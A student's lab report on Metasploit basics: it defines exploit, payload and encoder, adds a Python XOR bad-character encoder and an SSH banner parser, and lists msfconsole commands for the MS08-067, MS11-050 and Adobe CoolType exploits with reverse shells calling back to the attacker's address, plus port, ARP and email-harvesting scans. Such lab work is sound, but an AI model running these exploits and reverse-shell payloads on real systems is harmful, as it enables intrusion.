20155333 "Network Confrontation" Exp5 MSF Basic Application
Basic questions
Explain in your own words what exploit, payload and encode are
- exploit: the means of delivery. It is the code that triggers a specific vulnerability (a service overflow, a browser bug, a file-format bug) and uses it to get the weapon (the payload) running on the target;
- payload: the weapon. It is the code that actually does something offensive once it runs on the target, for example a reverse shell or a meterpreter stager that connects back to the attacker;
- encode: an encoding step applied to the payload. The encoder is chosen according to the environment the payload will be placed in, so that its bytes survive delivery (no NUL bytes inside a C string, no line breaks inside a text protocol) and the payload can still run normally; a small decoder stub prepended to the encoded payload restores the original bytes on the target.
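The following block is an added illustration of what an encoder does; it is not Metasploit's own code and the "payload" bytes are constructed, not real shellcode. It picks a single-byte XOR key so that neither the key nor any encoded byte falls into a constructed bad-character set, and shows the case where no such key exists. Real msf encoders such as x86/shikata_ga_nai use a more elaborate transform, but the constraint they solve is the same one.

```python
"""Added example: single-byte XOR encoder that avoids bad characters.
Not Metasploit code; BAD_CHARS and SAMPLE are constructed for the demo."""

# Bytes the (hypothetical) delivery path cannot carry: NUL ends a C string,
# LF/CR end a line in a text protocol.
BAD_CHARS = {0x00, 0x0A, 0x0D}


def find_xor_key(payload: bytes, bad: set[int]) -> int:
    """Return a key k such that k itself and every payload byte XOR k
    stay out of `bad`. Raise ValueError if no single-byte key works."""
    for k in range(1, 256):
        # The key is embedded in the decoder stub that travels with the
        # payload, so the key byte must be clean too.
        if k in bad:
            continue
        if all((b ^ k) not in bad for b in payload):
            return k
    raise ValueError("no single-byte XOR key avoids the bad characters")


def has_single_byte_key(payload: bytes, bad: set[int]) -> bool:
    """True if a single-byte XOR encoding of `payload` can avoid `bad`."""
    try:
        find_xor_key(payload, bad)
        return True
    except ValueError:
        return False


def xor_encode(payload: bytes, bad: set[int]) -> tuple[int, bytes]:
    """Encode `payload`; return (key, encoded bytes)."""
    k = find_xor_key(payload, bad)
    return k, bytes(b ^ k for b in payload)


def xor_decode(key: int, blob: bytes) -> bytes:
    """What the decoder stub does on the target: restore the original bytes."""
    return bytes(b ^ key for b in blob)


def has_bad_chars(data: bytes, bad: set[int]) -> bool:
    return any(b in bad for b in data)


# Constructed sample "payload" (not shellcode): it contains 0x00, 0x0a and
# 0x0d, so it could not be delivered unencoded through the path above.
SAMPLE = bytes([0x31, 0xC0, 0x00, 0x0A, 0x50, 0x68,
                0x2F, 0x2F, 0x73, 0x68, 0x0D, 0x00])

if __name__ == "__main__":
    key, encoded = xor_encode(SAMPLE, BAD_CHARS)
    print(f"key=0x{key:02x} encoded={encoded.hex()} "
          f"clean={not has_bad_chars(encoded, BAD_CHARS)}")
    assert xor_decode(key, encoded) == SAMPLE
    # A payload containing every byte value defeats any single-byte key:
    # for each k some byte equals k and XORs to 0x00.
    print("full-range payload encodable:",
          has_single_byte_key(bytes(range(256)), BAD_CHARS))
```

The key search is why `show encoders` in msfconsole ranks encoders and why an encoder can fail with "no encoders encoded the buffer successfully": a single transform does not always have a solution for a given bad-character set.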
Practice
An active attack practice: ms08_067
①Attacker machine: Kali ②Target machine: Windows XP SP3 (English)
Run msfconsole on the Kali attacker machine to enter the console, then enter the following commands in sequence:
msf > use exploit/windows/smb/ms08_067_netapi
//Load the ms08_067 exploit; the argument to use is the module's path inside the framework
msf exploit(ms08_067_netapi) > show payloads
//List the payloads compatible with this exploit
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
//Reverse TCP shell: the target connects back to the attacker, so no inbound port on the target is needed
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.146
//Attacker machine IP (the address the target connects back to)
msf exploit(ms08_067_netapi) > set LPORT 5333
//Attacker port to listen on
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.18
//Target machine IP; the vulnerable service port (RPORT) is fixed by the module at 445 (SMB)
msf exploit(ms08_067_netapi) > set target 0
//Target 0 is Automatic Targeting: the module fingerprints the OS and language over SMB and picks the matching target
msf exploit(ms08_067_netapi) > exploit
//Launch the attack
A session is established. The successful attack result is as follows:
A browser-targeted attack: ms11_050
①Attacker machine: Kali ②Target machine: Windows XP Professional SP2 / Windows 7 Professional ③IE version: 7.0 / 8.0
Run msfconsole on the Kali attacker machine to enter the console, then enter the following commands in sequence:
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
//Load the ms11_050 browser exploit (CObjectElement use-after-free in IE's mshtml); it starts a web server that serves the exploit page
msf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
//Reverse HTTP meterpreter: the target connects back over HTTP to LHOST:LPORT
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 192.168.43.146
//Attacker machine IP
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 5333
//Port the meterpreter handler listens on (this is not the port that serves the exploit page)
msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH 5333rh123
//Path of the malicious page; if it is not set, the module generates a random path
msf exploit(ms11_050_mshtml_cobjectelement) > exploit
//Start the web server and the handler; the console prints the URL to send to the victim
Enter http://192.168.43.146:8080/5333rh123 in IE on the target (8080 is the module's default SRVPORT, the web server that serves the exploit page, and is separate from LPORT, which the payload connects back to). IE pops up the Data Execution Prevention dialog and a warning dialog; when this problem occurs the program has to be closed:
After changing the Internet security settings, it still failed!
A client-side attack: Adobe Reader
①Attacker machine: Kali ②Target machine: Windows XP Professional SP2 ③Adobe Reader version: 9.3
Run msfconsole on the Kali attacker machine to enter the console, then enter the following commands in sequence:
msf > use exploit/windows/fileformat/adobe_cooltype_sing
//Load the Adobe Reader CoolType SING table exploit; a fileformat module generates a malicious file instead of attacking a host directly
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
//Reverse TCP meterpreter
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.199.170
//Attacker machine IP, embedded in the payload inside the PDF
msf exploit(adobe_cooltype_sing) > set LPORT 5333
//Attacker port, embedded in the payload inside the PDF
msf exploit(adobe_cooltype_sing) > set FILENAME 20155333.pdf
//Name of the generated PDF file
msf exploit(adobe_cooltype_sing) > exploit
//Generate the file (it is written under ~/.msf4/local/)
20155333.pdf was generated successfully:
After transferring or copying the PDF to the target machine, type back on Kali to leave the current module, then load the handler (listener) module and enter the following commands:
msf > use exploit/multi/handler
//Generic payload handler: it does no exploitation, it only waits for the payload to connect back
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//Must be the same payload that was used when generating the PDF
msf exploit(handler) > set LHOST 192.168.199.170
//Attacker machine IP, the same LHOST as in the PDF
msf exploit(handler) > set LPORT 5333
//Port to listen on, the same LPORT as in the PDF
msf exploit(handler) > exploit
//Start listening and wait for the victim to open the file
Then open 20155333.pdf on the target machine.
The connection failed, presumably because I had downloaded Adobe Reader XI, which does not have this vulnerability.
Successful use of auxiliary modules
View all auxiliary modules with:
msf > show auxiliary
1. Port scan
msf > use auxiliary/scanner/portscan/syn
//Load the SYN port scanner module (it sends raw packets, so msfconsole has to run as root)
msf auxiliary(syn) > show options
//View the module's options; RHOSTS is required, PORTS selects the port range
msf auxiliary(syn) > set RHOSTS 192.168.199.140
//Target host (a single IP, a range or a CIDR block)
msf auxiliary(syn) > set THREADS 50
//Number of concurrent scanning threads
msf auxiliary(syn) > exploit
//Run the scan (for auxiliary modules, run and exploit are equivalent)
2. SSH server scan
msf > use auxiliary/scanner/ssh/ssh_version
//Load the ssh_version module: it connects to port 22, reads the server's identification banner and reports the version
msf auxiliary(ssh_version) > show options
//View the options
msf auxiliary(ssh_version) > set RHOSTS 10.107.100.0/24
//Target network segment
msf auxiliary(ssh_version) > set THREADS 50
//Number of concurrent scanning threads
msf auxiliary(ssh_version) > exploit
//Run the scan
3. Telnet server scan
msf > use auxiliary/scanner/telnet/telnet_version
//Load the telnet_version module: it connects to port 23 and reports the telnet banner
msf auxiliary(telnet_version) > show options
//View the options
msf auxiliary(telnet_version) > set RHOSTS 10.180.100.0/24
//Target network segment
msf auxiliary(telnet_version) > set THREADS 50
//Number of concurrent scanning threads
msf auxiliary(telnet_version) > exploit
//Run the scan
4. Search for email addresses belonging to a domain
msf > use auxiliary/gather/search_email_collector
//Load the search_email_collector module: it queries public search engines, so Kali needs Internet access
msf auxiliary(search_email_collector) > show options
//View the options
msf auxiliary(search_email_collector) > set DOMAIN baidu.com
//Target domain
msf auxiliary(search_email_collector) > exploit
//Run the collection
5. Find live hosts on the LAN
msf > use auxiliary/scanner/discovery/arp_sweep
//Load the arp_sweep module: it sends ARP requests, so it only works on the local Ethernet segment and needs root
msf auxiliary(arp_sweep) > show options
//View the options
msf auxiliary(arp_sweep) > set RHOSTS 10.180.100.0/24
//Target network segment
msf auxiliary(arp_sweep) > set THREADS 50
//Number of concurrent scanning threads
msf auxiliary(arp_sweep) > exploit
//Run the sweep
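What the ssh_version scan in item 2 above records is the SSH identification string the server sends on connect. The following block is an added example, not the module's code, that parses that string per RFC 4253 section 4.2 and handles the two things a scanner must tolerate: a server that prints extra lines (a login notice) before the real banner, and a line that is not SSH at all. The banners are constructed for the example; on a live host the same bytes come from socket.recv() right after connecting to port 22.

```python
"""Added example: parse an SSH server identification string (RFC 4253 4.2).
Not the ssh_version module's code; BANNERS below are constructed samples."""
import re
from dataclasses import dataclass
from typing import Optional

# SSH-protoversion-softwareversion [SP comments]
IDENT_RE = re.compile(
    r"^SSH-(?P<proto>[0-9.]+)-(?P<software>[^ \r\n]+)(?: (?P<comment>[^\r\n]*))?$"
)


@dataclass
class SshIdent:
    protoversion: str
    softwareversion: str
    comments: Optional[str]
    raw: str


def parse_ssh_banner(data: bytes) -> SshIdent:
    """Find and parse the identification line in what the server sent.

    The server may send arbitrary lines before the identification string;
    those lines must not start with 'SSH-', so the first line that does is
    the one to parse. Lines are CRLF-terminated; LF-only is tolerated.
    """
    text = data.decode("ascii", errors="replace")
    for line in text.split("\n"):
        line = line.rstrip("\r")
        if not line.startswith("SSH-"):
            continue  # pre-banner chatter, e.g. a legal notice
        if len(line) + 2 > 255:  # limit includes the CRLF
            raise ValueError("identification string too long")
        m = IDENT_RE.match(line)
        if not m:
            raise ValueError(f"malformed identification string: {line!r}")
        return SshIdent(m["proto"], m["software"], m["comment"], line)
    raise ValueError("no SSH identification string in data")


def banner_is_ssh(data: bytes) -> bool:
    """Scanner-style check: does this look like an SSH server at all?"""
    try:
        parse_ssh_banner(data)
        return True
    except ValueError:
        return False


def is_ssh2(ident: SshIdent) -> bool:
    # "1.99" is a server that speaks both SSH-1 and SSH-2
    return ident.protoversion in ("2.0", "1.99")


# Constructed banners (not captured from any real host)
BANNERS = {
    "openssh": b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\r\n",
    "dropbear_with_notice": b"Authorized use only.\r\nSSH-2.0-dropbear_2019.78\r\n",
    "legacy": b"SSH-1.99-Cisco-1.25\n",
    "not_ssh": b"220 mail.example.test ESMTP\r\n",
}

if __name__ == "__main__":
    for name, raw in BANNERS.items():
        if banner_is_ssh(raw):
            ident = parse_ssh_banner(raw)
            print(f"{name}: {ident.softwareversion} "
                  f"(proto {ident.protoversion}, ssh2={is_ssh2(ident)})")
        else:
            print(f"{name}: not an SSH server")
```

The software version field is what feeds later decisions (which auxiliary or exploit modules apply), so it is worth keeping the raw line as well: vendors put version details in the comments field rather than the software field.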
Attempt to exploit the ms11_006_createsizeddibsection vulnerability
Experiment summary and experience
This experiment was very difficult. Even after referring to the blogs of seniors and other students, I still failed to complete all of the practices successfully. I hope this can be improved.